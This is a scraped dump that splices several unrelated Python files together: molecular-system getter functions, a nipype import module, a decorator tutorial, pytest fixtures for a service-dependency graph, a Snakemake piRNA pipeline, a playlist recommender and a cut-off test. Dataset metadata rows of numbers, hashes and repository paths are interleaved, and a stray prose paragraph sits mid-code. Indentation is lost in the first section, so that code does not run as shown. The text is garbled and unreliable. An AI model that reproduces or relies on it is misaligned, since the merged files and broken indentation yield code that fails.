return tmp_item
def get_box_from_system(item, indices='all', frame_indices='all'):
from molsysmt import box_vectors_from_box_lengths_and_angles
lengths = get_box_lengths_from_system(item, indices=indices, frame_indices=frame_indices)
angles = get_box_angles_from_system(item, indices=indices, frame_indices=frame_indices)
tmp_item = box_vectors_from_box_lengths_and_angles(lengths, angles)
return tmp_item
def get_box_shape_from_system(item, indices='all', frame_indices='all'):
from molsysmt import box_shape_from_box_angles
angles = get_box_angles_from_system(item, indices=indices, frame_indices=frame_indices)
tmp_item = box_shape_from_box_angles(angles)
return tmp_item
def get_box_lengths_from_system(item, indices='all', frame_indices='all'):
tmp_item = item.unitcells[:,0:3]*0.1*unit.nanometers
    if frame_indices != 'all':
tmp_item = tmp_item[frame_indices,:]
return tmp_item
def get_box_angles_from_system(item, indices='all', frame_indices='all'):
tmp_item = item.unitcells[:,3:6]*unit.degrees
    if frame_indices != 'all':
tmp_item = tmp_item[frame_indices,:]
return tmp_item
def get_time_from_system(item, indices='all', frame_indices='all'):
    tmp_item = item.time*unit.picoseconds
    if frame_indices != 'all':
        tmp_item = tmp_item[frame_indices]
    return tmp_item
def get_step_from_system(item, indices='all', frame_indices='all'):
return None
def get_frame_from_system(item, indices='all', frame_indices='all'):
tmp_step = get_step_from_system(item, frame_indices=frame_indices)
tmp_time = get_time_from_system(item, frame_indices=frame_indices)
tmp_coordinates = get_coordinates_from_system(item, frame_indices=frame_indices)
tmp_box = get_box_from_system(item, frame_indices=frame_indices)
return tmp_step, tmp_time, tmp_coordinates, tmp_box
def get_n_frames_from_system(item, indices='all', frame_indices='all'):
return item.n_frames
def get_form_from_system(item, indices='all', frame_indices='all'):
return form_name
## bond
def get_index_from_bond(item, indices='all', frame_indices='all'):
return get_bond_index_from_bond(item, indices=indices)
def get_order_from_bond(item, indices='all', frame_indices='all'):
return get_bond_order_from_bond(item, indices=indices)
def get_type_from_bond(item, indices='all', frame_indices='all'):
return get_bond_type_from_bond(item, indices=indices)
def get_bond_index_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bond_index_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_bond_order_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bond_order_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_bond_type_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bond_type_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_index_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
###### Set
def set_box_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
def set_coordinates_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
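The frame-selection guards in the getters above should compare the sentinel by equality: `x is not 'all'` relies on string interning, which is implementation-dependent and raises a SyntaxWarning on modern CPython. A minimal standalone sketch of the pattern (hypothetical `select_frames` helper with plain lists instead of pytraj arrays):

```python
def select_frames(frames, frame_indices='all'):
    # Equality, not identity: `is` against a string literal is unreliable.
    if frame_indices != 'all':
        frames = [frames[i] for i in frame_indices]
    return frames

traj = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [2.0, 0.0, 0.0]]
assert select_frames(traj) == traj                        # 'all' keeps every frame
assert select_frames(traj, [0, 2]) == [traj[0], traj[2]]  # subset of frames
```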
| 38.528786 | 195 | 0.786613 | 9,409 | 61,569 | 4.686152 | 0.011585 | 0.120657 | 0.09707 | 0.132722 | 0.974871 | 0.969382 | 0.964347 | 0.952168 | 0.947111 | 0.93729 | 0 | 0.000205 | 0.129205 | 61,569 | 1,597 | 196 | 38.552912 | 0.822192 | 0.001007 | 0 | 0.460194 | 0 | 0 | 0.027067 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.258252 | false | 0 | 0.221359 | 0.032039 | 0.73301 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
3abc3c3bd1c6dbd02ddd0ed2ca79647e28cf559a | 463 | py | Python | nipype/interfaces/semtools/filtering/__init__.py | grlee77/nipype | 73f3a733ac1b7d9b09ec32a387905a9302423b87 | [
"BSD-3-Clause"
] | null | null | null | nipype/interfaces/semtools/filtering/__init__.py | grlee77/nipype | 73f3a733ac1b7d9b09ec32a387905a9302423b87 | [
"BSD-3-Clause"
] | null | null | null | nipype/interfaces/semtools/filtering/__init__.py | grlee77/nipype | 73f3a733ac1b7d9b09ec32a387905a9302423b87 | [
"BSD-3-Clause"
] | null | null | null | from .denoising import UnbiasedNonLocalMeans
from .featuredetection import (
    GenerateSummedGradientImage,
    CannySegmentationLevelSetImageFilter,
    DilateImage,
    TextureFromNoiseImageFilter,
    FlippedDifference,
    ErodeImage,
    GenerateBrainClippedImage,
    NeighborhoodMedian,
    GenerateTestImage,
    NeighborhoodMean,
    HammerAttributeCreator,
    TextureMeasureFilter,
    DilateMask,
    DumpBinaryTrainingVectors,
    DistanceMaps,
    STAPLEAnalysis,
    GradientAnisotropicDiffusionImageFilter,
    CannyEdge,
)
| 154.333333 | 418 | 0.909287 | 25 | 463 | 16.84 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053996 | 463 | 2 | 419 | 231.5 | 0.961187 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
3ada3a153a8c763ccc9603f61d471e3a4525eef1 | 778 | py | Python | REST/python-refresher-master/36_the_at_syntax_for_decorators/code.py | Rebell-Leader/bg | 616a40286fe1d34db2916762c477676ed8067cdb | [
"Apache-2.0"
] | null | null | null | REST/python-refresher-master/36_the_at_syntax_for_decorators/code.py | Rebell-Leader/bg | 616a40286fe1d34db2916762c477676ed8067cdb | [
"Apache-2.0"
] | null | null | null | REST/python-refresher-master/36_the_at_syntax_for_decorators/code.py | Rebell-Leader/bg | 616a40286fe1d34db2916762c477676ed8067cdb | [
"Apache-2.0"
] | null | null | null | user = {"username": "jose", "access_level": "guest"}
def make_secure(func):
def secure_function():
if user["access_level"] == "admin":
return func()
else:
return f"No admin permissions for {user['username']}."
return secure_function
@make_secure
def get_admin_password():
return "1234"
# -- keeping function name and docstring --
import functools
user = {"username": "jose", "access_level": "guest"}
def make_secure(func):
@functools.wraps(func)
def secure_function():
if user["access_level"] == "admin":
return func()
else:
return f"No admin permissions for {user['username']}."
return secure_function
@make_secure
def get_admin_password():
return "1234"
| 19.45 | 66 | 0.619537 | 90 | 778 | 5.177778 | 0.322222 | 0.103004 | 0.06867 | 0.094421 | 0.871245 | 0.871245 | 0.871245 | 0.871245 | 0.871245 | 0.871245 | 0 | 0.013675 | 0.248072 | 778 | 39 | 67 | 19.948718 | 0.782906 | 0.052699 | 0 | 0.916667 | 0 | 0 | 0.255782 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.083333 | 0.041667 | 0.083333 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
3af4bdf66e6be66fdb7af9d347b4cff0f2f73eae | 16,198 | py | Python | tests/conftest.py | googleinterns/userjourneytool | 0e70a7e8c66dd1d69faeccfb18ad02832bf561da | [
"Apache-2.0"
] | 3 | 2020-09-14T17:55:38.000Z | 2020-11-29T18:49:39.000Z | tests/conftest.py | googleinterns/userjourneytool | 0e70a7e8c66dd1d69faeccfb18ad02832bf561da | [
"Apache-2.0"
] | 50 | 2020-09-10T19:43:45.000Z | 2020-11-11T21:33:57.000Z | tests/conftest.py | googleinterns/userjourneytool | 0e70a7e8c66dd1d69faeccfb18ad02832bf561da | [
"Apache-2.0"
] | null | null | null | # pylint: disable=redefined-outer-name
import pytest
from graph_structures_pb2 import SLI, Client, Dependency, Node, NodeType, UserJourney
def pytest_addoption(parser):
parser.addoption(
"--local", action="store_true", default=False, help="run tests locally"
)
@pytest.fixture
def local(request):
return request.config.getoption("--local")
@pytest.fixture
def assert_same_elements():
def inner_assert_same_elements(list1, list2):
"""Asserts that two lists have the same elements, regardless of order.
We use this approach for unhashable and uncomparable types, e.g. proto messages.
Args:
list1: First list to assert.
list2: Second list to assert.
"""
# although it's slower/not strictly necessary to wrap the generator in
# a list, pytest will give a more informative error message this way.
assert len(list1) == len(list2)
assert all([element1 in list2 for element1 in list1])
assert all([element2 in list1 for element2 in list2])
return inner_assert_same_elements
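The fixture's order-insensitive comparison can be exercised outside pytest. A standalone sketch (hypothetical `same_elements` name) of why it uses membership tests instead of `set()`: proto messages and dicts are unhashable.

```python
def same_elements(list1, list2):
    # set(list1) == set(list2) would raise TypeError for unhashable items,
    # so fall back to a length check plus two-way membership checks.
    # Note: like the fixture, this can miss multiplicity mismatches
    # when both lists have the same length.
    return (len(list1) == len(list2)
            and all(e1 in list2 for e1 in list1)
            and all(e2 in list1 for e2 in list2))

protos = [{"name": "A"}, {"name": "B"}]
assert same_elements(protos, list(reversed(protos)))  # order ignored
assert not same_elements(protos, [{"name": "A"}])     # lengths differ
```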
@pytest.fixture
def slo_bounds():
return {
"slo_error_lower_bound": 0.1,
"slo_warn_lower_bound": 0.2,
"slo_warn_upper_bound": 0.8,
"slo_error_upper_bound": 0.9,
}
""" Example Node name message map data:
Service0 has children Endpoint0 and Endpoint1
Service1 has child Endpoint2
Endpoint0 depends on Endpoint1 and Endpoint2
Endpoint1 depends on Endpoint2
"""
@pytest.fixture
def example_node_name_message_map_service_relative_names():
service_relative_names = ["Service0", "Service1"]
return service_relative_names
@pytest.fixture
def example_node_name_message_map_endpoint_relative_names():
endpoint_relative_names = ["Endpoint0", "Endpoint1", "Endpoint2"]
return endpoint_relative_names
@pytest.fixture
def example_node_name_message_map(
slo_bounds,
example_node_name_message_map_service_relative_names,
example_node_name_message_map_endpoint_relative_names,
):
service_relative_names = example_node_name_message_map_service_relative_names
endpoint_relative_names = example_node_name_message_map_endpoint_relative_names
node_name_message_map = {
service_relative_names[0]: Node(
node_type=NodeType.NODETYPE_SERVICE,
name=service_relative_names[0],
child_names=[
f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
],
slis=[
SLI(
node_name=service_relative_names[0],
sli_value=0.5,
**slo_bounds,
),
],
),
service_relative_names[1]: Node(
node_type=NodeType.NODETYPE_SERVICE,
name=service_relative_names[1],
child_names=[f"{service_relative_names[1]}.{endpoint_relative_names[2]}"],
slis=[
SLI(
node_name=service_relative_names[1],
sli_value=0.5,
**slo_bounds,
),
],
),
f"{service_relative_names[0]}.{endpoint_relative_names[0]}": Node(
node_type=NodeType.NODETYPE_ENDPOINT,
name=f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
parent_name=service_relative_names[0],
dependencies=[
Dependency(
target_name=f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
source_name=f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
),
Dependency(
target_name=f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
source_name=f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
),
],
slis=[
SLI(
node_name=f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
sli_value=0.5,
**slo_bounds,
),
],
),
f"{service_relative_names[0]}.{endpoint_relative_names[1]}": Node(
node_type=NodeType.NODETYPE_ENDPOINT,
name=f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
parent_name=service_relative_names[0],
dependencies=[
Dependency(
target_name=f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
source_name=f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
),
],
slis=[
SLI(
node_name=f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
sli_value=0.5,
**slo_bounds,
),
],
),
f"{service_relative_names[1]}.{endpoint_relative_names[2]}": Node(
node_type=NodeType.NODETYPE_ENDPOINT,
name=f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
parent_name=service_relative_names[1],
slis=[
SLI(
node_name=f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
sli_value=0.5,
**slo_bounds,
),
],
),
}
return node_name_message_map
@pytest.fixture
def example_node_elements_from_node_map(
example_node_name_message_map_service_relative_names,
example_node_name_message_map_endpoint_relative_names,
):
service_relative_names = example_node_name_message_map_service_relative_names
endpoint_relative_names = example_node_name_message_map_endpoint_relative_names
expected_node_elements = [
{
"data": {
"id": service_relative_names[0],
"label": service_relative_names[0],
"ujt_id": service_relative_names[0],
},
"classes": "",
},
{
"data": {
"id": service_relative_names[1],
"label": service_relative_names[1],
"ujt_id": service_relative_names[1],
},
"classes": "",
},
{
"data": {
"id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
"label": endpoint_relative_names[0],
"parent": service_relative_names[0],
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
},
"classes": "",
},
{
"data": {
"id": f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
"label": endpoint_relative_names[1],
"parent": service_relative_names[0],
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
},
"classes": "",
},
{
"data": {
"id": f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
"label": endpoint_relative_names[2],
"parent": service_relative_names[1],
"ujt_id": f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
},
"classes": "",
},
]
return expected_node_elements
@pytest.fixture
def example_edge_elements_from_node_map(
example_node_name_message_map_service_relative_names,
example_node_name_message_map_endpoint_relative_names,
):
service_relative_names = example_node_name_message_map_service_relative_names
endpoint_relative_names = example_node_name_message_map_endpoint_relative_names
expected_edge_elements = [
{
"data": {
"source": f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
"target": f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
"id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}/{service_relative_names[0]}.{endpoint_relative_names[1]}",
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}/{service_relative_names[0]}.{endpoint_relative_names[1]}",
},
"classes": "",
},
{
"data": {
"source": f"{service_relative_names[0]}.{endpoint_relative_names[0]}",
"target": f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
"id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}/{service_relative_names[1]}.{endpoint_relative_names[2]}",
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[0]}/{service_relative_names[1]}.{endpoint_relative_names[2]}",
},
"classes": "",
},
{
"data": {
"source": f"{service_relative_names[0]}.{endpoint_relative_names[1]}",
"target": f"{service_relative_names[1]}.{endpoint_relative_names[2]}",
"id": f"{service_relative_names[0]}.{endpoint_relative_names[1]}/{service_relative_names[1]}.{endpoint_relative_names[2]}",
"ujt_id": f"{service_relative_names[0]}.{endpoint_relative_names[1]}/{service_relative_names[1]}.{endpoint_relative_names[2]}",
},
"classes": "",
},
]
return expected_edge_elements
""" Example client name message map data:
Client0 has UserJourneys UJ0 and UJ1
Client1 has UserJourneys UJ2
UJ0 depends on Service0 and Service1
UJ1 depends on Service2
UJ2 depends on Service3
"""
@pytest.fixture
def example_client_name_message_map_client_relative_names():
client_relative_names = ["Client0", "Client1"]
return client_relative_names
@pytest.fixture
def example_client_name_message_map_user_journey_relative_names():
user_journey_relative_names = ["UJ0", "UJ1", "UJ2"]
return user_journey_relative_names
@pytest.fixture
def example_client_name_message_map_service_relative_names():
service_relative_names = ["Service0", "Service1", "Service2", "Service3"]
return service_relative_names
@pytest.fixture
def example_client_name_message_map(
example_client_name_message_map_client_relative_names,
example_client_name_message_map_user_journey_relative_names,
example_client_name_message_map_service_relative_names,
):
client_relative_names = example_client_name_message_map_client_relative_names
user_journey_relative_names = (
example_client_name_message_map_user_journey_relative_names
)
service_relative_names = example_client_name_message_map_service_relative_names
client_name_message_map = {
client_relative_names[0]: Client(
name=client_relative_names[0],
user_journeys=[
UserJourney(
name=f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
client_name=client_relative_names[0],
dependencies=[
Dependency(
target_name=service_relative_names[0],
source_name=f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
toplevel=True,
),
Dependency(
target_name=service_relative_names[1],
source_name=f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
toplevel=True,
),
],
),
UserJourney(
name=f"{client_relative_names[0]}.{user_journey_relative_names[1]}",
client_name=client_relative_names[0],
dependencies=[
Dependency(
target_name=service_relative_names[2],
source_name=f"{client_relative_names[0]}.{user_journey_relative_names[1]}",
toplevel=True,
),
],
),
],
),
client_relative_names[1]: Client(
name=client_relative_names[1],
user_journeys=[
UserJourney(
name=f"{client_relative_names[1]}.{user_journey_relative_names[2]}",
client_name=client_relative_names[1],
dependencies=[
Dependency(
target_name=service_relative_names[3],
source_name=f"{client_relative_names[1]}.{user_journey_relative_names[2]}",
toplevel=True,
),
],
),
],
),
}
return client_name_message_map
@pytest.fixture
def example_node_elements_from_client_map(
example_client_name_message_map_client_relative_names,
):
client_relative_names = example_client_name_message_map_client_relative_names
expected_node_elements = [
{
"data": {
"id": client_relative_names[0],
"label": client_relative_names[0],
"ujt_id": client_relative_names[0],
},
"classes": "",
},
{
"data": {
"id": client_relative_names[1],
"label": client_relative_names[1],
"ujt_id": client_relative_names[1],
},
"classes": "",
},
]
return expected_node_elements
@pytest.fixture
def example_edge_elements_from_client_map(
example_client_name_message_map_client_relative_names,
example_client_name_message_map_user_journey_relative_names,
example_client_name_message_map_service_relative_names,
):
client_relative_names = example_client_name_message_map_client_relative_names
user_journey_relative_names = (
example_client_name_message_map_user_journey_relative_names
)
service_relative_names = example_client_name_message_map_service_relative_names
expected_edge_elements = [
{
"data": {
"source": client_relative_names[0],
"target": service_relative_names[0],
"id": f"{client_relative_names[0]}/{service_relative_names[0]}",
"ujt_id": f"{client_relative_names[0]}/{service_relative_names[0]}",
"user_journey_name": f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
},
"classes": "",
},
{
"data": {
"source": client_relative_names[0],
"target": service_relative_names[1],
"id": f"{client_relative_names[0]}/{service_relative_names[1]}",
"ujt_id": f"{client_relative_names[0]}/{service_relative_names[1]}",
"user_journey_name": f"{client_relative_names[0]}.{user_journey_relative_names[0]}",
},
"classes": "",
},
{
"data": {
"source": client_relative_names[0],
"target": service_relative_names[2],
"id": f"{client_relative_names[0]}/{service_relative_names[2]}",
"ujt_id": f"{client_relative_names[0]}/{service_relative_names[2]}",
"user_journey_name": f"{client_relative_names[0]}.{user_journey_relative_names[1]}",
},
"classes": "",
},
{
"data": {
"source": client_relative_names[1],
"target": service_relative_names[3],
"id": f"{client_relative_names[1]}/{service_relative_names[3]}",
"ujt_id": f"{client_relative_names[1]}/{service_relative_names[3]}",
"user_journey_name": f"{client_relative_names[1]}.{user_journey_relative_names[2]}",
},
"classes": "",
},
]
return expected_edge_elements
| 37.49537 | 143 | 0.591061 | 1,697 | 16,198 | 5.1868 | 0.086034 | 0.32788 | 0.220404 | 0.100205 | 0.843445 | 0.806294 | 0.773688 | 0.748693 | 0.721313 | 0.692343 | 0 | 0.020964 | 0.302074 | 16,198 | 431 | 144 | 37.582367 | 0.757629 | 0.024571 | 0 | 0.516484 | 0 | 0 | 0.26898 | 0.226657 | 0 | 0 | 0 | 0 | 0.016484 | 1 | 0.043956 | false | 0 | 0.005495 | 0.005495 | 0.087912 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
aafb3fe45b726413782e891759e2d8640f5b1038 | 2,230 | py | Python | piRNA_analysis/snakemake/12_table_to_fasta_v3.py | rberrens/SPOCD1-piRNA_directed_DNA_met | 8e795436197ef41f07159624e45d6b0fddb1ded8 | [
"MIT"
] | 4 | 2020-07-17T12:03:38.000Z | 2021-03-11T03:30:20.000Z | piRNA_analysis/snakemake/12_table_to_fasta_v3.py | rberrens/SPOCD1-piRNA_directed_DNA_met | 8e795436197ef41f07159624e45d6b0fddb1ded8 | [
"MIT"
] | null | null | null | piRNA_analysis/snakemake/12_table_to_fasta_v3.py | rberrens/SPOCD1-piRNA_directed_DNA_met | 8e795436197ef41f07159624e45d6b0fddb1ded8 | [
"MIT"
] | 1 | 2021-08-15T07:11:52.000Z | 2021-08-15T07:11:52.000Z | configfile: 'config_spocd1_pi_simple.yaml'
cutadapt = "/usr/local/bin/cutadapt"
bowtie = "/usr/local/Cellar/bowtie/1.2.1.1/bin/bowtie"
rule all:
input:
expand("Processed/v3/fasta/spocd1_pi_IAPEz_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_IAPEy_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_L1MdA_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_L1MdT_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_L1MdGf_{sample}.fasta", sample = config["samples"]),
expand("Processed/v3/fasta/spocd1_pi_L1MdF2_{sample}.fasta", sample = config["samples"])
rule IAPEz:
input:
table = "Processed/v3/view/spocd1_pi_IAPEz_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_IAPEz_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule IAPEy:
input:
table = "Processed/v3/view/spocd1_pi_IAPEy_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_IAPEy_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule L1MdA:
input:
table = "Processed/v3/view/spocd1_pi_L1MdA_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_L1MdA_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule L1MdT:
input:
table = "Processed/v3/view/spocd1_pi_L1MdT_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_L1MdT_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule L1MdGf:
input:
table = "Processed/v3/view/spocd1_pi_L1MdGf_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_L1MdGf_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
rule L1MdF2:
input:
table = "Processed/v3/view/spocd1_pi_L1MdF2_{sample}.txt"
output:
fasta = "Processed/v3/fasta/spocd1_pi_L1MdF2_{sample}.fasta"
shell:
"""
perl ../perl/table_to_fasta.pl {input.table} > {output.fasta}
"""
| 30.135135 | 94 | 0.676682 | 295 | 2,230 | 4.881356 | 0.125424 | 0.105556 | 0.133333 | 0.183333 | 0.875 | 0.861806 | 0.857639 | 0.720139 | 0.651389 | 0.468056 | 0 | 0.032516 | 0.158744 | 2,230 | 74 | 95 | 30.135135 | 0.735075 | 0 | 0 | 0.404255 | 0 | 0 | 0.570618 | 0.546795 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c9194344f040afc641007e369d934ebb05c21134 | 5,017 | py | Python | recommenders/script/main/top_pop_p.py | edervishaj/spotify-recsys-challenge | 4077201ac7e4ed9da433bd10a92c183614182437 | [
"Apache-2.0"
] | 3 | 2018-10-12T20:19:57.000Z | 2019-12-11T01:11:38.000Z | recommenders/script/main/top_pop_p.py | kiminh/spotify-recsys-challenge | 5e7844a77ce3c26658400f161d2d74d682f30e69 | [
"Apache-2.0"
] | null | null | null | recommenders/script/main/top_pop_p.py | kiminh/spotify-recsys-challenge | 5e7844a77ce3c26658400f161d2d74d682f30e69 | [
"Apache-2.0"
] | 4 | 2018-10-27T20:30:18.000Z | 2020-10-14T07:43:27.000Z | from utils.datareader import Datareader
from utils.post_processing import eurm_remove_seed
import numpy as np
import scipy.sparse as sps
from tqdm import tqdm
import sys
class Top_pop_p(object):
'''
Class that allow the user to get the personalized top pop build following track or album
'''
    def __init__(self):
        pass
def get_top_pop_album(self, mode):
'''
:return: csr_matrix filled with the reccomendation for the cat 2 following album
'''
if mode == "online":
self.dr_on = Datareader(verbose=False, mode='online', only_load=True)
self.urm_on = self.dr_on.get_urm()
self.urm_col = sps.csc_matrix(self.urm_on)
self.top_p = np.zeros(self.urm_on.shape[1])
eurm = sps.lil_matrix(self.urm_on.shape)
pids = self.dr_on.get_test_pids(cat=2)
pids_all = self.dr_on.get_test_pids()
ucm_album = self.dr_on.get_ucm_albums().tocsc()
album_dic = self.dr_on.get_track_to_album_dict()
for row in tqdm(pids):
track_ind = self.urm_on.indices[self.urm_on.indptr[row]:self.urm_on.indptr[row + 1]][0]
album = album_dic[track_ind]
playlists = ucm_album.indices[ucm_album.indptr[album]:ucm_album.indptr[album+1]]
top = self.urm_on[playlists].sum(axis=0).A1.astype(np.int32)
track_ind_rec = top.argsort()[-501:][::-1]
eurm[row, track_ind_rec] = top[track_ind_rec]
eurm = eurm.tocsr()[pids_all]
eurm = eurm_remove_seed(eurm, self.dr_on)
elif mode == "offline":
self.dr_of = Datareader(verbose=False, mode='offline', only_load=True)
self.urm_of = self.dr_of.get_urm()
self.urm_col = sps.csc_matrix(self.urm_of)
self.top_p = np.zeros(self.urm_of.shape[1])
eurm = sps.lil_matrix(self.urm_of.shape)
pids = self.dr_of.get_test_pids(cat=2)
pids_all = self.dr_of.get_test_pids()
ucm_album = self.dr_of.get_ucm_albums().tocsc()
album_dic = self.dr_of.get_track_to_album_dict()
for row in tqdm(pids):
track_ind = self.urm_of.indices[self.urm_of.indptr[row]:self.urm_of.indptr[row + 1]][0]
album = album_dic[track_ind]
playlists = ucm_album.indices[ucm_album.indptr[album]:ucm_album.indptr[album+1]]
top = self.urm_of[playlists].sum(axis=0).A1.astype(np.int32)
track_ind_rec = top.argsort()[-501:][::-1]
eurm[row, track_ind_rec] = top[track_ind_rec]
eurm = eurm.tocsr()[pids_all]
eurm = eurm_remove_seed(eurm, self.dr_of)
return eurm.copy().tocsr()
def get_top_pop_track(self, mode):
'''
:return: csr_matrix filled with the reccomendation for the cat 2 following track
'''
if mode == "online":
self.dr_on = Datareader(verbose=False, mode='online', only_load=True)
self.urm_on = self.dr_on.get_urm()
self.urm_col = sps.csc_matrix(self.urm_on)
self.top_p = np.zeros(self.urm_on.shape[1])
eurm = sps.lil_matrix(self.urm_on.shape)
pids = self.dr_on.get_test_pids(cat=2)
pids_all = self.dr_on.get_test_pids()
for row in tqdm(pids):
track_ind = self.urm_on.indices[self.urm_on.indptr[row]:self.urm_on.indptr[row + 1]][0]
playlists = self.urm_col.indices[ self.urm_col.indptr[track_ind]: self.urm_col.indptr[track_ind+1]]
top = self.urm_on[playlists].sum(axis=0).A1.astype(np.int32)
track_ind_rec = top.argsort()[-501:][::-1]
eurm[row, track_ind_rec] = top[track_ind_rec]
eurm = eurm.tocsr()[pids_all]
eurm = eurm_remove_seed(eurm, self.dr_on)
elif mode == "offline":
self.dr_of = Datareader(verbose=False, mode='offline', only_load=True)
self.urm_of = self.dr_of.get_urm()
self.urm_col = sps.csc_matrix(self.urm_of)
self.top_p = np.zeros(self.urm_of.shape[1])
eurm = sps.lil_matrix(self.urm_of.shape)
pids = self.dr_of.get_test_pids(cat=2)
pids_all = self.dr_of.get_test_pids()
for row in tqdm(pids):
track_ind = self.urm_of.indices[self.urm_of.indptr[row]:self.urm_of.indptr[row + 1]][0]
playlists = self.urm_col.indices[self.urm_col.indptr[track_ind]: self.urm_col.indptr[track_ind + 1]]
top = self.urm_of[playlists].sum(axis=0).A1.astype(np.int32)
track_ind_rec = top.argsort()[-501:][::-1]
eurm[row, track_ind_rec] = top[track_ind_rec]
eurm = eurm.tocsr()[pids_all]
eurm = eurm_remove_seed(eurm, self.dr_of)
return eurm.copy().tocsr()
if __name__ == '__main__':
    t = Top_pop_p()
    t.get_top_pop_album("online")
"""Tests for rsa.py and collision.py (with deniability)."""
from deniable.collision import collision_finder
from deniable.rsa import decryption


def test_collision_finder():
    """Can we properly use the collision finder?"""
    cipher = "7928186168759"
